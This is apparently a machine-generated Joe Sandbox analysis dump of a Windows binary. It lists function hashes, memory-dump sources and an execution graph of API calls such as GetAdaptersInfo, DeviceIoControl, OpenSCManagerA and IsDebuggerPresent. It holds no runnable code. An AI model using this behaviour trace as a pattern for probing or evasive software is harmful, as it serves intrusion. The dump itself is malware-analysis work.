                                                                                  • Opcode ID: 13593e553e6be281e96d7bb953d56a5927f6c498d227b46fc847c2a148732c0c
                                                                                  • Instruction ID: c7bdba2715fb66454707c14724f72c320a39a9c6e4158119f2851cf94b52ae50
                                                                                  • Opcode Fuzzy Hash: 13593e553e6be281e96d7bb953d56a5927f6c498d227b46fc847c2a148732c0c
                                                                                  • Instruction Fuzzy Hash: F2F0C871A04708ABCB00DFB59D4249EB7E8EB4E31575049B7FC04E7642E7785E049558
                                                                                  APIs
                                                                                    • Part of subcall function 0047D550: FreeLibrary.KERNEL32(74A90000,00481F13), ref: 0047D566
                                                                                    • Part of subcall function 0047D220: GetTickCount.KERNEL32 ref: 0047D26A
                                                                                    • Part of subcall function 0045733C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 0045735B
                                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00499033), ref: 00498731
                                                                                  • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00499033), ref: 00498737
                                                                                  Strings
                                                                                  • Detected restart. Removing temporary directory., xrefs: 004986EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                  • String ID: Detected restart. Removing temporary directory.
                                                                                  • API String ID: 1717587489-3199836293
                                                                                  • Opcode ID: dacc005acb48f2c9a6c17312f31363653640754999933287209c5bc8a26dcf54
                                                                                  • Instruction ID: 1f2dec6c19a68f67b40637f6c2d8dd05bc5c387ef6d5d21522d9e9d16f9083c3
                                                                                  • Opcode Fuzzy Hash: dacc005acb48f2c9a6c17312f31363653640754999933287209c5bc8a26dcf54
                                                                                  • Instruction Fuzzy Hash: 91E0A0716086402ADA0277AA7C1296B3B5CDB46768B6144BFF80491A52E92C4811C67D
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 1458359878-0
                                                                                  • Opcode ID: 648dda9fcfa3be0796cf1e21ca424cd02d6c478e8aba2200b071bc3282ec43fd
                                                                                  • Instruction ID: c9025c94a886fb5f76285139ad04fc7cdabfdd445e85fa9ce07bcd72d8186167
                                                                                  • Opcode Fuzzy Hash: 648dda9fcfa3be0796cf1e21ca424cd02d6c478e8aba2200b071bc3282ec43fd
                                                                                  • Instruction Fuzzy Hash: 0FF0B472B00914E74F20A5AAA99197F678CEA9D376F10852BFC04D7307C53DDD098AED

                                                                                  Execution Graph

                                                                                  Execution Coverage:10.3%
                                                                                  Dynamic/Decrypted Code Coverage:83.5%
                                                                                  Signature Coverage:4%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:32
                                                                                  execution_graph 18086 4025c7 18087 40b106 CreateDirectoryA 18086->18087 18088 402568 18086->18088 18088->18087 18089 2d6f8de LoadLibraryA 18090 2d6f907 GetProcAddress 18089->18090 18091 2d6f9c1 18089->18091 18092 2d6f9ba FreeLibrary 18090->18092 18095 2d6f91b 18090->18095 18092->18091 18093 2d6f92d GetAdaptersInfo 18093->18095 18094 2d6f9b5 18094->18092 18095->18093 18095->18094 18097 2d73a8f 18095->18097 18099 2d73a97 18097->18099 18100 2d73ab1 18099->18100 18102 2d73ab5 std::exception::exception 18099->18102 18105 2d72eec 18099->18105 18122 2d78143 RtlDecodePointer 18099->18122 18100->18095 18124 2d7449a 18102->18124 18104 2d73adf 18106 2d72f67 18105->18106 18113 2d72ef8 18105->18113 18107 2d78143 __calloc_impl RtlDecodePointer 18106->18107 18108 2d72f6d 18107->18108 18109 2d75d9b __cftof_l 58 API calls 18108->18109 18121 2d72f5f 18109->18121 18111 2d72f2b RtlAllocateHeap 18111->18113 18111->18121 18113->18111 18114 2d72f53 18113->18114 18115 2d72f03 18113->18115 18116 2d78143 __calloc_impl RtlDecodePointer 18113->18116 18119 2d72f51 18113->18119 18174 2d75d9b 18114->18174 18115->18113 18127 2d78613 18115->18127 18136 2d78670 18115->18136 18171 2d7825c 18115->18171 18116->18113 18120 2d75d9b __cftof_l 58 API calls 18119->18120 18120->18121 18121->18099 18123 2d78156 18122->18123 18123->18099 18125 2d744b9 RaiseException 18124->18125 18125->18104 18177 2d800be 18127->18177 18129 2d7861a 18130 2d78627 18129->18130 18131 2d800be __NMSG_WRITE 59 API calls 18129->18131 18132 2d78670 __NMSG_WRITE 59 API calls 18130->18132 18134 2d78649 18130->18134 18131->18130 18133 2d7863f 18132->18133 18135 2d78670 __NMSG_WRITE 59 API calls 18133->18135 18134->18115 18135->18134 18137 2d7868e __NMSG_WRITE 18136->18137 18139 2d800be __NMSG_WRITE 55 API calls 18137->18139 18170 2d787b5 18137->18170 18138 2d7448b __cftof_l 6 API calls 18140 2d7881e 18138->18140 18141 2d786a1 18139->18141 18140->18115 18142 2d787ba GetStdHandle 18141->18142 18143 2d800be __NMSG_WRITE 55 API calls 18141->18143 18146 2d787c8 _strlen 18142->18146 18142->18170 18144 2d786b2 18143->18144 18144->18142 18145 2d786c4 18144->18145 18145->18170 18221 2d7f47d 18145->18221 18148 2d78801 WriteFile 18146->18148 18146->18170 18148->18170 18150 2d78822 18154 2d74e45 __invoke_watson 8 API calls 18150->18154 18151 2d786f1 GetModuleFileNameW 18152 2d78711 18151->18152 18153 2d78721 __NMSG_WRITE 18151->18153 18155 2d7f47d __NMSG_WRITE 55 API calls 18152->18155 18153->18150 18158 2d78767 18153->18158 18230 2d7f4f2 18153->18230 18157 2d7882c 18154->18157 18155->18153 18156 2d78851 RtlEnterCriticalSection 18156->18115 18157->18156 18273 2d788b5 18157->18273 18158->18150 18239 2d7f411 18158->18239 18162 2d78844 18162->18156 18295 2d7837f 18162->18295 18164 2d7f411 __NMSG_WRITE 55 API calls 18167 2d7879e 18164->18167 18167->18150 18168 2d787a5 18167->18168 18248 2d800fe RtlEncodePointer 18168->18248 18170->18138 18358 2d78228 GetModuleHandleExW 18171->18358 18361 2d75bb2 GetLastError 18174->18361 18176 2d75da0 18176->18119 18178 2d800c8 18177->18178 18179 2d800d2 18178->18179 18180 2d75d9b __cftof_l 59 API calls 18178->18180 18179->18129 18181 2d800ee 18180->18181 18184 2d74e35 18181->18184 18187 2d74e0a RtlDecodePointer 18184->18187 18188 2d74e1d 18187->18188 18193 2d74e45 IsProcessorFeaturePresent 18188->18193 18191 2d74e0a __cftof_l 8 API calls 18192 2d74e41 18191->18192 18192->18129 18194 2d74e50 18193->18194 18199 2d74cd8 18194->18199 18198 2d74e34 18198->18191 18200 2d74cf2 _memset ___raise_securityfailure 18199->18200 18201 2d74d12 IsDebuggerPresent 18200->18201 18207 2d79468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18201->18207 18204 2d74dd6 ___raise_securityfailure 18208 2d7448b 18204->18208 18205 2d74df9 18206 2d79453 GetCurrentProcess TerminateProcess 18205->18206 18206->18198 18207->18204 18209 2d74495 IsProcessorFeaturePresent 18208->18209 18210 2d74493 18208->18210 18212 2d794cf 18209->18212 18210->18205 18215 2d7947e IsDebuggerPresent 18212->18215 18216 2d79493 ___raise_securityfailure 18215->18216 18217 2d79468 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 18216->18217 18219 2d7949b ___raise_securityfailure 18217->18219 18218 2d79453 ___raise_securityfailure GetCurrentProcess TerminateProcess 18220 2d794b8 18218->18220 18219->18218 18220->18205 18222 2d7f496 18221->18222 18223 2d7f488 18221->18223 18224 2d75d9b __cftof_l 59 API calls 18222->18224 18223->18222 18228 2d7f4af 18223->18228 18225 2d7f4a0 18224->18225 18226 2d74e35 __cftof_l 9 API calls 18225->18226 18227 2d786e4 18226->18227 18227->18150 18227->18151 18228->18227 18229 2d75d9b __cftof_l 59 API calls 18228->18229 18229->18225 18234 2d7f500 18230->18234 18231 2d7f504 18232 2d7f509 18231->18232 18233 2d75d9b __cftof_l 59 API calls 18231->18233 18232->18158 18235 2d7f534 18233->18235 18234->18231 18234->18232 18237 2d7f543 18234->18237 18236 2d74e35 __cftof_l 9 API calls 18235->18236 18236->18232 18237->18232 18238 2d75d9b __cftof_l 59 API calls 18237->18238 18238->18235 18240 2d7f42b 18239->18240 18242 2d7f41d 18239->18242 18241 2d75d9b __cftof_l 59 API calls 18240->18241 18247 2d7f435 18241->18247 18242->18240 18245 2d7f457 18242->18245 18243 2d74e35 __cftof_l 9 API calls 18244 2d78787 18243->18244 18244->18150 18244->18164 18245->18244 18246 2d75d9b __cftof_l 59 API calls 18245->18246 18246->18247 18247->18243 18249 2d80132 ___crtIsPackagedApp 18248->18249 18250 2d801f1 IsDebuggerPresent 18249->18250 18251 2d80141 LoadLibraryExW 18249->18251 18254 2d801fb 18250->18254 18255 2d80216 18250->18255 18252 2d80158 GetLastError 18251->18252 18253 2d8017e GetProcAddress 18251->18253 18258 2d80167 LoadLibraryExW 18252->18258 18261 2d8020e 18252->18261 18259 2d80192 7 API calls 18253->18259 18253->18261 18256 2d80209 18254->18256 18260 2d80202 OutputDebugStringW 18254->18260 18255->18256 18257 2d8021b RtlDecodePointer 18255->18257 18256->18261 18262 2d8025a 18256->18262 18267 2d80242 RtlDecodePointer RtlDecodePointer 18256->18267 18257->18261 18258->18253 18258->18261 18263 2d801da GetProcAddress RtlEncodePointer 18259->18263 18264 2d801ee 18259->18264 18260->18256 18265 2d7448b __cftof_l 6 API calls 18261->18265 18266 2d80292 RtlDecodePointer 18262->18266 18272 2d8027e RtlDecodePointer 18262->18272 18263->18264 18264->18250 18268 2d802e0 18265->18268 18270 2d80299 18266->18270 18266->18272 18267->18262 18268->18170 18271 2d802aa RtlDecodePointer 18270->18271 18270->18272 18271->18272 18272->18261 18274 2d788c1 __getstream 18273->18274 18275 2d78613 __FF_MSGBANNER 59 API calls 18274->18275 18288 2d788e0 18274->18288 18276 2d788cf 18275->18276 18278 2d78670 __NMSG_WRITE 59 API calls 18276->18278 18281 2d788d6 18278->18281 18280 2d78903 __getstream 18280->18162 18286 2d7825c __mtinitlocknum 3 API calls 18281->18286 18282 2d788fe 18284 2d75d9b __cftof_l 59 API calls 18282->18284 18283 2d7890d 18307 2d7882d 18283->18307 18284->18280 18286->18288 18287 2d78914 18289 2d78921 18287->18289 18290 2d78939 18287->18290 18288->18280 18302 2d789f4 18288->18302 18314 2d7914c 18289->18314 18317 2d72eb4 18290->18317 18293 2d7892d 18323 2d78955 18293->18323 18296 2d78613 __FF_MSGBANNER 59 API calls 18295->18296 18297 2d78387 18296->18297 18298 2d78670 __NMSG_WRITE 59 API calls 18297->18298 18299 2d7838f 18298->18299 18328 2d7842e 18299->18328 18306 2d78a02 18302->18306 18303 2d72eec _malloc 59 API calls 18303->18306 18304 2d788f7 18304->18282 18304->18283 18306->18303 18306->18304 18326 2d79445 Sleep 18306->18326 18308 2d78851 RtlEnterCriticalSection 18307->18308 18309 2d7883e 18307->18309 18308->18287 18310 2d788b5 __mtinitlocknum 58 API calls 18309->18310 18311 2d78844 18310->18311 18311->18308 18312 2d7837f __amsg_exit 58 API calls 18311->18312 18313 2d78850 18312->18313 18313->18308 18315 2d7915c 18314->18315 18316 2d79169 InitializeCriticalSectionAndSpinCount 18314->18316 18315->18293 18316->18293 18318 2d72ebd HeapFree 18317->18318 18322 2d72ee6 __dosmaperr 18317->18322 18319 2d72ed2 18318->18319 18318->18322 18320 2d75d9b __cftof_l 57 API calls 18319->18320 18321 2d72ed8 GetLastError 18320->18321 18321->18322 18322->18293 18327 2d78997 RtlLeaveCriticalSection 18323->18327 18325 2d7895c 18325->18280 18326->18306 18327->18325 18331 2d784e4 18328->18331 18330 2d7839a 18332 2d784f0 __getstream 18331->18332 18333 2d7882d __lock 52 API calls 18332->18333 18334 2d784f7 18333->18334 18335 2d785b0 __cinit 18334->18335 18336 2d78525 RtlDecodePointer 18334->18336 18351 2d785fe 18335->18351 18336->18335 18338 2d7853c RtlDecodePointer 18336->18338 18344 2d7854c 18338->18344 18340 2d7860d __getstream 18340->18330 18342 2d785f5 18345 2d7825c __mtinitlocknum 3 API calls 18342->18345 18343 2d78559 RtlEncodePointer 18343->18344 18344->18335 18344->18343 18346 2d78569 RtlDecodePointer RtlEncodePointer 18344->18346 18347 2d785fe 18345->18347 18349 2d7857b RtlDecodePointer RtlDecodePointer 18346->18349 18348 2d7860b 18347->18348 18356 2d78997 RtlLeaveCriticalSection 18347->18356 18348->18330 18349->18344 18352 2d78604 18351->18352 18353 2d785de 18351->18353 18357 2d78997 RtlLeaveCriticalSection 18352->18357 18353->18340 18355 2d78997 RtlLeaveCriticalSection 18353->18355 18355->18342 18356->18348 18357->18353 18359 2d78241 GetProcAddress 18358->18359 18360 2d78253 ExitProcess 18358->18360 18359->18360 18375 2d7910b 18361->18375 18363 2d75bc7 18364 2d75c15 SetLastError 18363->18364 18378 2d789ac 18363->18378 18364->18176 18368 2d75bee 18369 2d75bf4 18368->18369 18370 2d75c0c 18368->18370 18387 2d75c21 18369->18387 18372 2d72eb4 _free 56 API calls 18370->18372 18374 2d75c12 18372->18374 18373 2d75bfc GetCurrentThreadId 18373->18364 18374->18364 18376 2d79122 TlsGetValue 18375->18376 18377 2d7911e 18375->18377 18376->18363 18377->18363 18379 2d789b3 18378->18379 18381 2d75bda 18379->18381 18383 2d789d1 18379->18383 18397 2d803f8 18379->18397 18381->18364 18384 2d7912a 18381->18384 18383->18379 18383->18381 18405 2d79445 Sleep 18383->18405 18385 2d79144 TlsSetValue 18384->18385 18386 2d79140 18384->18386 18385->18368 18386->18368 18388 2d75c2d __getstream 18387->18388 18389 2d7882d __lock 59 API calls 18388->18389 18390 2d75c6a 18389->18390 18406 2d75cc2 18390->18406 18393 2d7882d __lock 59 API calls 18394 2d75c8b ___addlocaleref 18393->18394 18409 2d75ccb 18394->18409 18396 2d75cb6 __getstream 18396->18373 18398 2d80403 18397->18398 18400 2d8041e 18397->18400 18399 2d8040f 18398->18399 18398->18400 18401 2d75d9b __cftof_l 58 API calls 18399->18401 18402 2d8042e RtlAllocateHeap 18400->18402 18403 2d80414 18400->18403 18404 2d78143 __calloc_impl RtlDecodePointer 18400->18404 18401->18403 18402->18400 18402->18403 18403->18379 18404->18400 18405->18383 18412 2d78997 RtlLeaveCriticalSection 18406->18412 18408 2d75c84 18408->18393 18413 2d78997 RtlLeaveCriticalSection 18409->18413 18411 2d75cd2 18411->18396 18412->18408 18413->18411 18414 40228b 18415 40b305 GetModuleFileNameA 18414->18415 18422 402c70 18415->18422 18418 40b655 CommandLineToArgvW 18419 40b878 GetLocalTime 18418->18419 18424 401f27 18419->18424 18423 402ce1 GetCommandLineW 18422->18423 18423->18418 18425 401f3c 18424->18425 18428 401a1d 18425->18428 18427 401f45 18429 401a2c 18428->18429 18434 401a4f CreateFileA 18429->18434 18433 401a3e 18433->18427 18435 401a35 18434->18435 18437 401a7d 18434->18437 18442 401b4b LoadLibraryA 18435->18442 18436 401a98 DeviceIoControl 18436->18437 18437->18436 18439 401b3a CloseHandle 18437->18439 18440 401b0e GetLastError 18437->18440 18451 402ba6 18437->18451 18454 402b98 18437->18454 18439->18435 18440->18437 18440->18439 18443 401c21 18442->18443 18444 401b6e GetProcAddress 18442->18444 18443->18433 18445 401c18 FreeLibrary 18444->18445 18449 401b85 18444->18449 18445->18443 18446 401b95 GetAdaptersInfo 18446->18449 18447 402ba6 7 API calls 18447->18449 18448 401c15 18448->18445 18449->18446 18449->18447 18449->18448 18450 402b98 12 API calls 18449->18450 18450->18449 18457 402f51 18451->18457 18487 402eb1 18454->18487 18458 402baf 18457->18458 18459 402f5d 18457->18459 18458->18437 18460 402f67 18459->18460 18461 402f7d 18459->18461 18463 402fa9 HeapFree 18460->18463 18464 402f73 18460->18464 18462 402fa8 18461->18462 18465 402f97 18461->18465 18462->18463 18463->18458 18468 403e3a 18464->18468 18474 4048cb 18465->18474 18469 403e78 18468->18469 18473 40412e 18468->18473 18470 404074 VirtualFree 18469->18470 18469->18473 18471 4040d8 18470->18471 18472 4040e7 VirtualFree HeapFree 18471->18472 18471->18473 18472->18473 18473->18458 18475 4048f8 18474->18475 18477 40490e 18474->18477 18475->18477 18478 4047b2 18475->18478 18477->18458 18481 4047bf 18478->18481 18479 40486f 18479->18477 18480 4047e0 VirtualFree 18480->18481 18481->18479 18481->18480 18483 40475c VirtualFree 18481->18483 18484 404779 18483->18484 18485 4047a9 18484->18485 18486 404789 HeapFree 18484->18486 18485->18481 18486->18481 18488 402ba3 18487->18488 18490 402eb8 18487->18490 18488->18437 18490->18488 18491 402edd 18490->18491 18493 402eec 18491->18493 18498 402f01 18491->18498 18492 402efa 18495 402f40 HeapAlloc 18492->18495 18496 402f4f 18492->18496 18497 402eff 18492->18497 18493->18492 18500 404163 18493->18500 18495->18496 18496->18490 18497->18490 18498->18492 18498->18495 18506 404910 18498->18506 18501 404195 18500->18501 18502 404234 18501->18502 18505 404243 18501->18505 18513 40446c 18501->18513 18502->18505 18520 40451d 18502->18520 18505->18492 18511 40491e 18506->18511 18507 404a0a VirtualAlloc 18512 4049db 18507->18512 18508 404adf 18524 404618 18508->18524 18511->18507 18511->18508 18511->18512 18512->18492 18512->18512 18514 4044af HeapAlloc 18513->18514 18515 40447f HeapReAlloc 18513->18515 18517 4044ff 18514->18517 18518 4044d5 VirtualAlloc 18514->18518 18516 40449e 18515->18516 18515->18517 18516->18514 18517->18502 18518->18517 18519 4044ef HeapFree 18518->18519 18519->18517 18521 40452f VirtualAlloc 18520->18521 18523 404578 18521->18523 18523->18505 18525 404625 18524->18525 18526 40462c HeapAlloc 18524->18526 18527 404649 VirtualAlloc 18525->18527 18526->18527 18532 404681 18526->18532 18528 404669 VirtualAlloc 18527->18528 18529 40473e 18527->18529 18530 404730 VirtualFree 18528->18530 18528->18532 18531 404746 HeapFree 18529->18531 18529->18532 18530->18529 18531->18532 18532->18512 18533 2d9fe14 18534 2d9fdaa 18533->18534 18535 2d9fe1f 18533->18535 18539 2da0dfa 18534->18539 18540 2da0e22 WriteFile 18539->18540 18541 2db07e6 CloseHandle 18540->18541 18543 2dc70de 18541->18543 18544 40218f Sleep 18545 40b766 18544->18545 18546 2dcc1c8 18547 2df58b1 18546->18547 18549 2d72eec 59 API calls 18547->18549 18548 2df58b6 18550 2d72eec 59 API calls 18548->18550 18549->18548 18550->18548 18551 4026d6 OpenSCManagerA 18552 40261f 18551->18552 18553 40b0d7 18554 40b0d9 18553->18554 18557 2d73c52 18554->18557 18558 2d73c60 18557->18558 18559 2d73c5b 18557->18559 18563 2d73c75 18558->18563 18571 2d7b821 18559->18571 18562 40b0f0 18564 2d73c81 __getstream 18563->18564 18568 2d73ccf ___DllMainCRTStartup 18564->18568 18570 2d73d2c __getstream 18564->18570 18575 2d73ae0 18564->18575 18566 2d73d09 18567 2d73ae0 __CRT_INIT@12 138 API calls 18566->18567 18566->18570 18567->18570 18568->18566 18569 2d73ae0 __CRT_INIT@12 138 API calls 18568->18569 18568->18570 18569->18566 18570->18562 18572 2d7b844 18571->18572 18573 2d7b851 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18571->18573 18572->18573 18574 2d7b848 18572->18574 18573->18574 18574->18558 18576 2d73aec __getstream 18575->18576 18577 2d73af4 18576->18577 18578 2d73b6e 18576->18578 18623 2d78126 GetProcessHeap 18577->18623 18580 2d73bd7 18578->18580 18586 2d73b72 18578->18586 18582 2d73bdc 18580->18582 18583 2d73c3a 18580->18583 18581 2d73af9 18594 2d73afd __CRT_INIT@12 __getstream 18581->18594 18624 2d75cd4 18581->18624 18584 2d7910b __freeptd TlsGetValue 18582->18584 18583->18594 18755 2d75b64 18583->18755 18588 2d73be7 18584->18588 18585 2d73b93 18727 2d78272 RtlDecodePointer 18585->18727 18586->18585 18586->18594 18724 2d7839b 18586->18724 18588->18594 18595 2d789ac __calloc_crt 59 API calls 18588->18595 18592 2d73b09 __RTC_Initialize 18592->18594 18601 2d73b19 GetCommandLineA 18592->18601 18594->18568 18597 2d73bf8 18595->18597 18596 2d73ba9 __CRT_INIT@12 18751 2d73bc2 18596->18751 18597->18594 18602 2d7912a __freeptd TlsSetValue 18597->18602 18598 2d7b4bf __ioterm 60 API calls 18600 2d73ba4 18598->18600 18603 2d75d4a __mtterm 62 API calls 18600->18603 18645 2d7b8bd GetEnvironmentStringsW 18601->18645 18605 2d73c10 18602->18605 18603->18596 18607 2d73c16 18605->18607 18608 2d73c2e 18605->18608 18610 2d75c21 __initptd 59 API calls 18607->18610 18611 2d72eb4 _free 59 API calls 18608->18611 18613 2d73c1e GetCurrentThreadId 18610->18613 18611->18594 18612 2d73b33 18614 2d73b37 18612->18614 18677 2d7b511 18612->18677 18613->18594 18710 2d75d4a 18614->18710 18618 2d73b57 18618->18594 18623->18581 18763 2d78442 RtlEncodePointer 18624->18763 18626 2d75cd9 18768 2d7895e 18626->18768 18629 2d75ce2 18631 2d75d4a __mtterm 62 API calls 18629->18631 18632 2d75ce7 18631->18632 18632->18592 18634 2d75cff 18635 2d789ac __calloc_crt 59 API calls 18634->18635 18636 2d75d0c 18635->18636 18637 2d75d41 18636->18637 18638 2d7912a __freeptd TlsSetValue 18636->18638 18639 2d75d4a __mtterm 62 API calls 18637->18639 18640 2d75d20 18638->18640 18641 2d75d46 18639->18641 18640->18637 18642 2d75d26 18640->18642 18641->18592 18643 2d75c21 __initptd 59 API calls 18642->18643 18644 2d75d2e GetCurrentThreadId 18643->18644 18644->18592 18646 2d73b29 18645->18646 18647 2d7b8d0 WideCharToMultiByte 18645->18647 18658 2d7b20b 18646->18658 18649 2d7b903 18647->18649 18650 2d7b93a FreeEnvironmentStringsW 18647->18650 18651 2d789f4 __malloc_crt 59 API calls 18649->18651 18650->18646 18652 2d7b909 18651->18652 18652->18650 18653 2d7b910 WideCharToMultiByte 18652->18653 18654 2d7b926 18653->18654 18655 2d7b92f FreeEnvironmentStringsW 18653->18655 18656 2d72eb4 _free 59 API calls 18654->18656 18655->18646 18657 2d7b92c 18656->18657 18657->18655 18659 2d7b217 __getstream 18658->18659 18660 2d7882d __lock 59 API calls 18659->18660 18661 2d7b21e 18660->18661 18662 2d789ac __calloc_crt 59 API calls 18661->18662 18664 2d7b22f 18662->18664 18663 2d7b29a GetStartupInfoW 18671 2d7b2af 18663->18671 18672 2d7b3de 18663->18672 18664->18663 18665 2d7b23a @_EH4_CallFilterFunc@8 __getstream 18664->18665 18665->18612 18666 2d7b4a6 18776 2d7b4b6 18666->18776 18668 2d789ac __calloc_crt 59 API calls 18668->18671 18669 2d7b42b GetStdHandle 18669->18672 18670 2d7b43e GetFileType 18670->18672 18671->18668 18671->18672 18674 2d7b2fd 18671->18674 18672->18666 18672->18669 18672->18670 18676 2d7914c __getstream InitializeCriticalSectionAndSpinCount 18672->18676 18673 2d7b331 GetFileType 18673->18674 18674->18672 18674->18673 18675 2d7914c __getstream InitializeCriticalSectionAndSpinCount 18674->18675 18675->18674 18676->18672 18678 2d7b524 GetModuleFileNameA 18677->18678 18679 2d7b51f 18677->18679 18681 2d7b551 18678->18681 18786 2d751ca 18679->18786 18780 2d7b5c4 18681->18780 18684 2d789f4 __malloc_crt 59 API calls 18685 2d7b58a 18684->18685 18687 2d73b43 18685->18687 18687->18618 18688 2d7b740 18687->18688 18711 2d75d54 18710->18711 18712 2d75d5a 18710->18712 19028 2d790ec 18711->19028 18714 2d78877 RtlDeleteCriticalSection 18712->18714 18715 2d78893 18712->18715 18716 2d72eb4 _free 59 API calls 18714->18716 18717 2d7889f RtlDeleteCriticalSection 18715->18717 18718 2d788b2 18715->18718 18716->18712 18717->18715 18718->18594 18725 2d784e4 _doexit 59 API calls 18724->18725 18726 2d783a6 18725->18726 18726->18585 18728 2d7829e 18727->18728 18729 2d7828c 18727->18729 18730 2d72eb4 _free 59 API calls 18728->18730 18729->18728 18732 2d72eb4 _free 59 API calls 18729->18732 18731 2d782ab 18730->18731 18733 2d782cf 18731->18733 18735 2d72eb4 _free 59 API calls 18731->18735 18732->18729 18734 2d72eb4 _free 59 API calls 18733->18734 18736 2d782db 18734->18736 18735->18731 18737 2d72eb4 _free 59 API calls 18736->18737 18738 2d782ec 18737->18738 18739 2d72eb4 _free 59 API calls 18738->18739 18740 2d782f7 18739->18740 18741 2d7831c RtlEncodePointer 18740->18741 18744 2d72eb4 _free 59 API calls 18740->18744 18742 2d78331 18741->18742 18743 2d78337 18741->18743 18745 2d72eb4 _free 59 API calls 18742->18745 18746 2d7834d 18743->18746 18748 2d72eb4 _free 59 API calls 18743->18748 18747 2d7831b 18744->18747 18745->18743 18749 2d73b98 18746->18749 18750 2d72eb4 _free 59 API calls 18746->18750 18747->18741 18748->18746 18749->18596 18749->18598 18750->18749 18752 2d73bc6 18751->18752 18753 2d73bd4 18751->18753 18752->18753 18754 2d75d4a __mtterm 62 API calls 18752->18754 18753->18594 18754->18753 18756 2d75b71 18755->18756 18757 2d75b97 18755->18757 18758 2d75b7f 18756->18758 18759 2d7910b __freeptd TlsGetValue 18756->18759 18757->18594 18760 2d7912a __freeptd TlsSetValue 18758->18760 18759->18758 18761 2d75b8f 18760->18761 19031 2d75a2f 18761->19031 18764 2d78453 __init_pointers __initp_misc_winsig 18763->18764 18775 2d7394a RtlEncodePointer 18764->18775 18766 2d7846b __init_pointers 18767 2d791ba 34 API calls 18766->18767 18767->18626 18771 2d7896a 18768->18771 18769 2d7914c __getstream InitializeCriticalSectionAndSpinCount 18769->18771 18770 2d75cde 18770->18629 18772 2d790ce 18770->18772 18771->18769 18771->18770 18773 2d790e5 TlsAlloc 18772->18773 18774 2d75cf4 18772->18774 18774->18629 18774->18634 18775->18766 18779 2d78997 RtlLeaveCriticalSection 18776->18779 18778 2d7b4bd 18778->18665 18779->18778 18782 2d7b5e6 18780->18782 18785 2d7b64a 18782->18785 18790 2d81516 18782->18790 18783 2d7b567 18783->18684 18783->18687 18784 2d81516 _parse_cmdline 59 API calls 18784->18785 18785->18783 18785->18784 18787 2d751da 18786->18787 18788 2d751d3 18786->18788 18787->18678 18846 2d75527 18788->18846 18793 2d814bc 18790->18793 18796 2d721bb 18793->18796 18797 2d721cc 18796->18797 18800 2d72219 18796->18800 18800->18782 18847 2d75533 __getstream 18846->18847 18848 2d75b9a ___InternalCxxFrameHandler 59 API calls 18847->18848 18849 2d7553b 18848->18849 18850 2d75481 _LocaleUpdate::_LocaleUpdate 59 API calls 18849->18850 19029 2d79103 TlsFree 19028->19029 19030 2d790ff 19028->19030 19029->18712 19030->18712 19033 2d75a3b __getstream 19031->19033 19032 2d75a54 19035 2d75a63 19032->19035 19037 2d72eb4 _free 59 API calls 19032->19037 19033->19032 19034 2d72eb4 _free 59 API calls 19033->19034 19036 2d75b43 __getstream 19033->19036 19034->19032 19038 2d75a72 19035->19038 19039 2d72eb4 _free 59 API calls 19035->19039 19036->18757 19037->19035 19040 2d75a81 19038->19040 19041 2d72eb4 _free 59 API calls 19038->19041 19039->19038 19042 2d75a90 19040->19042 19043 2d72eb4 _free 59 API calls 19040->19043 19041->19040 19044 2d72eb4 _free 59 API calls 19042->19044 19045 2d75a9f 19042->19045 19043->19042 19044->19045 19046 2d75aae 19045->19046 19047 2d72eb4 _free 59 API calls 19045->19047 19048 2d75ac0 19046->19048 19049 2d72eb4 _free 59 API calls 19046->19049 19047->19046 19050 2d7882d __lock 59 API calls 19048->19050 19049->19048 19053 2d75ac8 19050->19053 19051 2d75aeb 19063 2d75b4f 19051->19063 19053->19051 19055 2d72eb4 _free 59 API calls 19053->19055 19055->19051 19056 2d7882d __lock 59 API calls 19061 2d75aff ___removelocaleref 19056->19061 19057 2d75b30 19096 2d75b5b 19057->19096 19060 2d72eb4 _free 59 API calls 19060->19036 19061->19057 19066 2d74f05 19061->19066 19099 2d78997 RtlLeaveCriticalSection 19063->19099 19065 2d75af8 19065->19056 19067 2d74f7e 19066->19067 19069 2d74f1a 19066->19069 19068 2d72eb4 _free 59 API calls 19067->19068 19070 2d74fcb 19067->19070 19071 2d74f9f 19068->19071 19069->19067 19078 2d72eb4 _free 59 API calls 19069->19078 19091 2d74f4b 19069->19091 19094 2d74ff4 19070->19094 19140 2d7d47d 